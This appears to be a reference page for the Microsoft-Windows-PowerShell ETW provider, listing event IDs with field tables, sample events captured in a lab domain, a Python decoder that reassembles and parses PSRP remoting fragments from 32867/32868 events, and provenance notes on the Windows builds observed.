| Name | Description |
|---|---|
ObjectId Int64 | |
FragmentId Int64 | |
sFlag Int32 | Known values: 1 = start fragment of the object (S bit), 0 = continuation |
eFlag Int32 | Known values: 1 = end fragment of the object (E bit), 0 = more fragments follow |
FragmentLength UInt32 | |
FragmentPayload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32868,
"version": 1,
"level": 5,
"task": 0,
"opcode": 21,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.022+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"FragmentId": 0,
"FragmentLength": 202,
"FragmentPayload": "0x01000000020001000000000000000000000000000000000000000000000000000000000000000000EFBBBF3C4F626A2052656649643D2230223E3C4D533E3C56657273696F6E204E3D2270726F746F636F6C76657273696F6E223E322E333C2F56657273696F6E3E3C56657273696F6E204E3D22505356657273696F6E223E322E303C2F56657273696F6E3E3C56657273696F6E204E3D2253657269616C697A6174696F6E56657273696F6E223E312E312E302E313C2F56657273696F6E3E3C2F4D533E3C2F4F626A3E",
"ObjectId": 1,
"eFlag": 1,
"sFlag": 1
},
"message": "win:None"
}
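An added example, not code from the page or from PowerShell: a decoder for the FragmentPayload of the 32867/32868 events that also reassembles objects split across several fragments (sFlag on the first, eFlag on the last) and names the Destination and MessageType values that the 32769 and 32849 events report as bare numbers. The sample is the 32868 payload above rebuilt from its parts; the message-type table is the subset of MS-PSRP section 2.2.1 used here; the function names and split_into_fragments, which fabricates multi-fragment records purely to exercise reassembly, are this example's own.

```python
import struct
import uuid
from xml.etree import ElementTree

# PSRP message types, a subset of the table in MS-PSRP section 2.2.1, and the
# Destination values behind the numbers in the 32769/32849 events above.
MESSAGE_TYPES = {
    0x00010002: "SESSION_CAPABILITY", 0x00010004: "INIT_RUNSPACEPOOL",
    0x00010005: "PUBLIC_KEY", 0x00010006: "ENCRYPTED_SESSION_KEY",
    0x00010007: "PUBLIC_KEY_REQUEST", 0x00021005: "RUNSPACEPOOL_STATE",
    0x00021006: "CREATE_PIPELINE", 0x00021009: "APPLICATION_PRIVATE_DATA",
    0x0002100B: "RUNSPACEPOOL_INIT_DATA", 0x00041002: "PIPELINE_INPUT",
    0x00041004: "PIPELINE_OUTPUT", 0x00041005: "ERROR_RECORD",
    0x00041006: "PIPELINE_STATE",
}
DESTINATIONS = {1: "Client", 2: "Server"}

# The 32868 example's FragmentPayload, rebuilt from its parts so the layout is
# visible: Destination, MessageType, RPID, PID, UTF-8 BOM, CLIXML.
CLIXML_HEX = "".join((
    "3C4F626A2052656649643D2230223E",                                      # <Obj RefId="0">
    "3C4D533E",                                                            # <MS>
    "3C56657273696F6E204E3D2270726F746F636F6C76657273696F6E223E",          # <Version N="protocolversion">
    "322E33", "3C2F56657273696F6E3E",                                      # 2.3</Version>
    "3C56657273696F6E204E3D22505356657273696F6E223E",                      # <Version N="PSVersion">
    "322E30", "3C2F56657273696F6E3E",                                      # 2.0</Version>
    "3C56657273696F6E204E3D2253657269616C697A6174696F6E56657273696F6E223E",  # <Version N="SerializationVersion">
    "312E312E302E31", "3C2F56657273696F6E3E",                              # 1.1.0.1</Version>
    "3C2F4D533E", "3C2F4F626A3E",                                          # </MS></Obj>
))
SAMPLE_32868 = {"event_data": {
    "ObjectId": 1, "FragmentId": 0, "sFlag": 1, "eFlag": 1, "FragmentLength": 202,
    "FragmentPayload": "0x01000000" + "02000100" + "00" * 32 + "EFBBBF" + CLIXML_HEX,
}}


def parse_psrp_message(blob):
    """Decode one PSRP message: two little-endian uint32 (Destination, MessageType),
    two GUIDs in .NET byte order (RPID, PID), then BOM-prefixed CLIXML."""
    if len(blob) < 40:
        raise ValueError("PSRP message shorter than its 40-byte header")
    destination, msg_type = struct.unpack_from("<II", blob, 0)
    rpid = uuid.UUID(bytes_le=blob[8:24])
    pid = uuid.UUID(bytes_le=blob[24:40])
    data = blob[40:]
    if data.startswith(b"\xef\xbb\xbf"):
        data = data[3:]
    return {
        "destination": DESTINATIONS.get(destination, destination),
        "message_type": MESSAGE_TYPES.get(msg_type, "0x%08X" % msg_type),
        "runspace_pool_id": str(rpid),
        "pipeline_id": str(pid),
        "clixml": data.decode("utf-8"),
    }


def session_versions(clixml):
    """Pull the <Version N="..."> values out of a SESSION_CAPABILITY object."""
    root = ElementTree.fromstring(clixml)
    return {el.get("N"): el.text for el in root.iter() if el.tag.split("}")[-1] == "Version"}


def reassemble_fragments(events):
    """Yield (ObjectId, decoded message) for each object completed by a stream of
    32867/32868 records. sFlag restarts an object, eFlag completes it; fragments
    are joined in FragmentId order and a gap raises instead of yielding a torn message."""
    pending = {}
    for ev in events:
        d = ev["event_data"]
        payload = bytes.fromhex(d["FragmentPayload"][2:])  # strip the 0x prefix
        if len(payload) != d["FragmentLength"]:
            raise ValueError("ObjectId %d: FragmentLength %d but payload is %d bytes"
                             % (d["ObjectId"], d["FragmentLength"], len(payload)))
        if d["sFlag"] == 1:
            pending[d["ObjectId"]] = {}
        parts = pending.setdefault(d["ObjectId"], {})
        parts[d["FragmentId"]] = payload
        if d["eFlag"] == 1:
            if sorted(parts) != list(range(len(parts))):
                raise ValueError("ObjectId %d: fragment(s) missing" % d["ObjectId"])
            blob = b"".join(parts[i] for i in range(len(parts)))
            del pending[d["ObjectId"]]
            yield d["ObjectId"], parse_psrp_message(blob)


def split_into_fragments(object_id, blob, chunk):
    """Fabricate the 32867-style records a multi-fragment object would produce
    (used only to exercise reassembly; real traces supply these themselves)."""
    pieces = [blob[i:i + chunk] for i in range(0, len(blob), chunk)]
    return [{"event_data": {
        "ObjectId": object_id, "FragmentId": n, "sFlag": int(n == 0),
        "eFlag": int(n == len(pieces) - 1), "FragmentLength": len(piece),
        "FragmentPayload": "0x" + piece.hex().upper()}}
        for n, piece in enumerate(pieces)]


if __name__ == "__main__":
    for object_id, message in reassemble_fragments([SAMPLE_32868]):
        print(object_id, message["destination"], message["message_type"],
              session_versions(message["clixml"]))
```

Feed the generator the 32867 (received) or 32868 (sent) records of one trace in time order, keyed per process; CREATE_PIPELINE messages then come out with their CLIXML intact, and a trace that lost a fragment fails loudly rather than producing a message with a hole in it.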
Event ID 40961: PowerShell console is starting up
#Description
PowerShell console is starting up.
Message #
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 40961,
"version": 1,
"level": 4,
"task": 4,
"opcode": 1,
"keywords": 0,
"time_created": "2026-06-13T05:24:19.4248057+00:00",
"event_record_id": 164809,
"correlation": {
"ActivityID": "{AA583517-FAF4-0001-143A-58AAF4FADC01}"
},
"execution": {
"process_id": 7180,
"thread_id": 7184
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "PowerShell console is starting up"
}
Event ID 40962: PowerShell console is ready for user input
#Description
PowerShell console is ready for user input.
Message #
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 40962,
"version": 1,
"level": 4,
"task": 4,
"opcode": 2,
"keywords": 0,
"time_created": "2026-06-13T05:24:20.0746353+00:00",
"event_record_id": 164811,
"correlation": {
"ActivityID": "{AA583517-FAF4-0001-143A-58AAF4FADC01}"
},
"execution": {
"process_id": 7180,
"thread_id": 7184
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "PowerShell console is ready for user input"
}
Event ID 45057: Tracing ErrorRecord.
#Description
Tracing ErrorRecord.
Message #
Fields #
| Name | Description |
|---|---|
Message UnicodeString | [Exception Details] Message. |
Category UnicodeString | |
Reason UnicodeString | |
TargetName UnicodeString | |
FullyQualifiedErrorId UnicodeString | [Tracing ErrorRecord] FullyQualifiedErrorId. |
ExceptionMessage UnicodeString | |
ExceptionStackTrace UnicodeString | |
ExceptionInnerException UnicodeString |
Event ID 45058: Exception: Message: Message StackTrace: StackTrace InnerException : InnerException.
#Event ID 45060: Tracing Job: Id: Id InstanceId: InstanceId Name: Name Location: Location State: State Command: Command.
#Description
Tracing Job.
Message #
Fields #
| Name | Description |
|---|---|
Id UnicodeString | [Tracing Job] Id. |
InstanceId UnicodeString | [Tracing Job] InstanceId. |
Name UnicodeString | [Tracing Job] Name. |
Location UnicodeString | [Tracing Job] Location. |
State UnicodeString | [Tracing Job] State. |
Command UnicodeString | [Tracing Job] Command. |
Event ID 45061: Trace Information.
#Description
Trace Information.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 45061,
"version": 1,
"level": 4,
"task": 0,
"opcode": 0,
"keywords": "0x2000000000000000",
"time_created": "2026-06-02T04:29:47.998+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "OutOfProcessUtils.ProcessElement : PS_OUT_OF_PROC_DATA received, psGuid : 00000000-0000-0000-0000-000000000000"
},
"message": "win:None"
}
Event ID 45062: Connection Paramters are Connection URI: Connection_URI Resource URI: Resource_URI User: User OpenTimeout: OpenTimeout IdleTimeout: IdleTimeout CancelTimeout: CancelTimeout AuthenticationMechanism:...
#Description
Connection Paramters are.
Message #
Fields #
| Name | Description |
|---|---|
uri UnicodeString | |
shell UnicodeString | |
userName UnicodeString | |
opentimeout UnicodeString | |
idletimeout UnicodeString | |
canceltimeout UnicodeString | |
auth UInt32 | Known values: WSMan authentication mechanism flags |
thumbPrint UnicodeString | |
redircount UnicodeString | |
recvdDataSize UnicodeString | |
recvdObjSize UnicodeString |
Event ID 45063: Workflow plugin loaded.
#Event ID 45064: Workflow execution started.
#Event ID 45065: Workflow state changed.
#Event ID 45072: Workflow plugin has been requested for a shutdown.
#Event ID 45073: Workflow plugin restarted.
#Event ID 45074: Workflow is resuming.
#Event ID 45075: A quota limit that was set for the endpoint was exceeded.
#Event ID 45076: Workflow has resumed.
#Event ID 45078: Workflow runspace pool was created.
#Event ID 45079: Activity was queued for execution.
#Event ID 45080: Activity execution started.
#Event ID 45081: Workflow is being imported from a XAML file.
#Event ID 45082: Workflow has been imported from a XAML file.
#Event ID 45083: Workflow could not be imported from a XAML file because of an error.
#Event ID 45084: Workflow validation started.
#Event ID 45085: Workflow validation succeeded.
#Event ID 45086: Workflow validation failed with error.
#Event ID 45087: Workflow activity validated.
#Event ID 45088: Workflow activity could not be validated.
#Event ID 45089: Activity execution failed.
#Event ID 45090: Runspace availability changed.
#Event ID 45091: Runspace state changed.
#Event ID 45092: Workflow loaded for execution.
#Event ID 45093: Workflow unloaded.
#Event ID 45094: Workflow execution cancelled.
#Event ID 45095: Workflow execution aborted.
#Event ID 45096: Workflow cleanup operation executed.
#Event ID 45097: Persisted workflow loaded from disk.
#Event ID 45098: Workflow data was deleted from disk.
#Event ID 45100: Starting remove job.
#Event ID 45101: Job state changed.
#Event ID 45102: Job error.
#Event ID 45104: Job created for workflow (child job).
#Event ID 45105: Parent job created for workflow.
#Event ID 45106: All required jobs were created for workflow execution.
#Event ID 45107: Child job removed for workflow.
#Event ID 45108: An error occurred while removing job.
#Event ID 45109: Loading workflow for execution.
#Event ID 45110: Workflow execution finished.
#Event ID 45111: Cancelling workflow execution.
#Event ID 45112: Aborting workflow execution.
#Event ID 45113: Unloading workflow.
#Event ID 45114: Forced workflow shutdown started.
#Event ID 45115: Forced workflow shutdown finished.
#Event ID 45116: An error occurred while forcefully shutting down a workflow.
#Event ID 45117: Persisting workflow to disk.
#Event ID 45118: Workflow persisted to disk.
#Event ID 45119: Activity execution finished.
#Event ID 45120: Workflow execution error.
#Event ID 45121: A new PowerShell endpoint was registered.
#Event ID 45122: Endpoint configuration modified.
#Event ID 45123: Endpoint configuration unregistered.
#Event ID 45124: Endpoint configuration disabled.
#Event ID 45125: Endpoint configuration enabled.
#Event ID 45126: Out of process runspace started.
#Event ID 45127: Parameter splatting was performed during workflow execution.
#Event ID 45128: Workflow engine started.
#Event ID 45129: Workflow manager instantiated with CheckpointPath: CheckpointPath ConfigProviderId: ConfigProviderId UserName: UserName Path: Path.
#Event ID 46337: BEGIN ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46338: END ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46339: BEGIN Creating new job in ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46340: END Creating new job in ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46341: END Creating new job in ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46342: BEGIN JobLogic ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46343: END JobLogic ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46344: BEGIN WorkflowExecution ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46345: END WorkflowExecution ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46346: WorkflowJob with Guid WorkflowJobInstanceId added to ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46347: ProxyJob with Guid ProxyJobInstanceId associated with remote ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46348: BEGIN Execution of ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46349: END Execution of ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46350: BEGIN Execution of Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46351: END Execution of Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46352: BEGIN StateChanged event handler for Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46353: END StateChanged event handler for Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46354: BEGIN StateChanged event handler for Proxy Child Job with Guid ProxyChildJobInstanceId.
#Event ID 46355: END StateChanged event handler for Proxy Child Job with Guid ProxyChildJobInstanceId.
#Event ID 46356: BEGIN Running garbage collection
#Description
BEGIN Running garbage collection.
Message #
Event ID 46358: Persistence store has reached its maximum specified size
#Description
Persistence store has reached its maximum specified size.
Message #
Event ID 49153: Trace Information.
#Event ID 53249: Scheduled Job ScheduledJobDefName started at StartTime.
#Event ID 53250: Scheduled Job ScheduledJobDefName completed at StopTime with state State.
#Event ID 53251: Scheduled Job Exception Message.
#Event ID 53504: Windows PowerShell has started an IPC listening thread on process: param1 in AppDomain: param2.
#Description
Windows PowerShell has started an IPC listening thread on process: param1 in AppDomain: param2. This is the named pipe (its name starts with PSHost.) that a Windows PowerShell host process opens so that Enter-PSHostProcess can attach a remoting session to it; 53507 and 53508 record each connection and disconnection together with the connecting user. Whoever can connect to that pipe runs commands inside the host process, so 53507 is the record of who attached to which PowerShell process, and connections to processes that a user has no business debugging are worth review.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | Process ID of the PowerShell host that opened the listener. |
param2 UnicodeString | AppDomain name the listener serves (DefaultAppDomain in the example). |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 53504,
"version": 1,
"level": 4,
"task": 111,
"opcode": 10,
"keywords": 0,
"time_created": "2026-06-13T14:08:49.4178649+00:00",
"event_record_id": 168240,
"correlation": {
"ActivityID": "{DFAAFF10-0837-4168-B0A2-798638094318}"
},
"execution": {
"process_id": 7864,
"thread_id": 7432
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"param1": "7864",
"param2": "DefaultAppDomain"
},
"message": "Windows PowerShell has started an IPC listening thread on process: 7864 in AppDomain: DefaultAppDomain."
}
Event ID 53505: Windows PowerShell has ended an IPC listening thread on process: param1 in AppDomain: param2.
#Event ID 53506: An error has occurred in Windows PowerShell IPC listening thread on process: param1 in AppDomain: param2.
#Event ID 53507: Windows PowerShell IPC connect on process: param1 in AppDomain: param2 for User: param3.
#Event ID 53508: Windows PowerShell IPC disconnect on process: param1 in AppDomain: param2 for User: param3.
#Provenance
Where this provider's schema came from, and which Windows build it was observed on. Windows can change a provider's event schema between builds, so use this to judge whether it matches the build you collect from.
ETW provider GUID {A0C1853B-5C40-4B15-8766-3CF1C58F985A}
Defined in PSEvents.dll, which carries the event manifest.
Observed on:
- WS2022-20348.4893 · sample captured from a live trace · binary version 10.0.20348.2849 · captured 2026-06-02
- WS2022-20348.4893 · schema read from the registered manifest · binary version 10.0.20348.2849 · captured 2026-06-02
- Win11-26200.6584 · schema read from the registered manifest · binary version 10.0.26100.1 · captured 2026-06-02
Downloads
- Microsoft-Windows-PowerShell registered manifest XML (WS2022-20348.4893) manifest-xml
- Microsoft-Windows-PowerShell registered manifest XML (Win11-26200.6584) manifest-xml